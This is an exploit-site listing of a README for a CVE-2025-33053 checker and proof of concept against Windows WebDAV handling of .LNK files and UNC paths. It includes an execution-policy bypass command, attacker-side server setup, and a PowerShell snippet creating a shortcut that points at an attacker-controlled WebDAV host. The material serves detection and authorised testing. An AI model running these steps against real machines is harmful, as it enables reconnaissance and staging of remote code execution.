Exploit for External Control of File Name or Path in Microsoft CVE-2025-33053

Name: Exploit for External Control of File Name or Path in Microsoft CVE-2025-33053
Rating: 5 (129 reviews)
2025-06-18 | CVSS 8.8
## https://sploitus.com/exploit?id=157B2D55-FDF3-55DD-96B9-D6A80DB087D7
# CVE-2025-33053 Vulnerability Checker & Proof-of-Concept (PoC)

![Checker Proof](misc/Checker_Proof.png)
Checker Proof

![PoC Proof](misc/PoC_proof.png)
PoC Proof

A complete set of tools to check and demonstrate potential exploitation of **CVE-2025-33053**, a critical WebDAV-based Remote Code Execution (RCE) vulnerability affecting Windows systems.

---

## 📌 About CVE-2025-33053

**CVE-2025-33053** allows attackers to exploit `.LNK` shortcut files that reference malicious remote WebDAV shares, potentially leading to Remote Code Execution (RCE) on affected systems.

### Vulnerability Conditions:
- **WebClient service** must be installed and running on the target.
- The target OS must **resolve UNC paths over WebDAV** when such paths are accessed — even via `.LNK` files.

---

## 🔍 How Does the Vulnerability Work?

1. **Crafted `.LNK` File or Direct UNC Path Access** — Points to a remote UNC path like:  
2. When the `.LNK` is accessed or the UNC path is manually browsed (e.g., via File Explorer): - The **WebClient service** initiates communication to the remote UNC location via WebDAV. - The system sends a **PROPFIND** request to query metadata from the attacker's server.
3. Upon receiving the PROPFIND request, the attacker can confirm that: - The target system resolves UNC paths via WebDAV. - The system is potentially vulnerable to **CVE-2025-33053**.

---

## ✅ Real-Time Vulnerability Checker (`CVE-2025-33053_checker.ps1`)

### What It Does:

| Check                                | Purpose                                                          |
|-------------------------------------|------------------------------------------------------------------|
| 🔍 **WebClient Service Status**      | Confirms if WebDAV support is active and running.                |
| 🔍 **UNC Path Handling via Test-Path**| Tests if the system resolves remote WebDAV UNC paths (key precondition for CVE exploitation). |



### How to Run:

1. **Open PowerShell as Administrator.**

2. If script execution is restricted, run:

```powershell
Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass
```

3. Run the checker: .\CVE-2025-33053_checker.ps1

---

## ⚙️ Proof-of-Concept (PoC) Server (CVE-2025-33053_PoC.py)
What It Does:
- Sets up a Python-based WebDAV-like server on the attacker's machine.
- Captures incoming PROPFIND requests when the victim system resolves the malicious UNC path.
- Displays in the terminal that the system reached out — proving exploitation possibility.
Note: Tested in VM.

Usage:
1. On the attacker's (Kali) machine:
```bash
python3 CVE-2025-33053_PoC.py --port 8000
```

2. On the target machine:
- Open the UNC path directly in File Explorer:
```FilePath
\\<Kali-IP>@8000\DavWWWRoot\route.exe
```

- Manually create a .LNK file in Windows or simply navigate to:
```css
\\<Kali-IP>@8000\DavWWWRoot\route.exe
```

- Example PowerShell method to create a shortcut file:
```powershell
$WScriptShell = New-Object -ComObject WScript.Shell
$Shortcut = $WScriptShell.CreateShortcut("C:\Users\Public\CVE-2025-33053-Test.lnk")
$Shortcut.TargetPath = "\\<Kali-IP>@8000\DavWWWRoot\route.exe"
$Shortcut.Save()
```

3. If the target is vulnerable the PoC server will log:
```css
[!] PROPFIND request received from <victim-ip> - Potential CVE-2025-33053 detected!
[!] Target system is VULNERABLE to CVE-2025-33053!
```

---

## 🔍 Why This PoC is Legitimate and Reliable:
✔️ Uses real UNC path resolution — no simulation.
✔️ Captures actual PROPFIND requests triggered by the OS — exact behavior required for CVE exploitation.
✔️ Demonstrates real network-level evidence of vulnerability, without executing payloads or causing harm.

---

## 🚧 Important Notes
This PoC does not exploit or harm the target system — it only detects the underlying vulnerable behavior.
Intended for use in controlled environments or with explicit authorization.
Demonstrates real system behavior — not a mock simulation.
**To be used for educational purposes only. Do not run in unauthorised systems.**

---

## 🏷️ License
MIT License — Free for educational, research, and defensive purposes only.

---

## 🤝 Contributing
Pull Requests welcome — improve detection, add features, or suggest fixes.

---

## ⚠️ Disclaimer
This repository is **for educational and authorized security research only.**
Misuse against systems you do not own or have permission to test is strictly forbidden.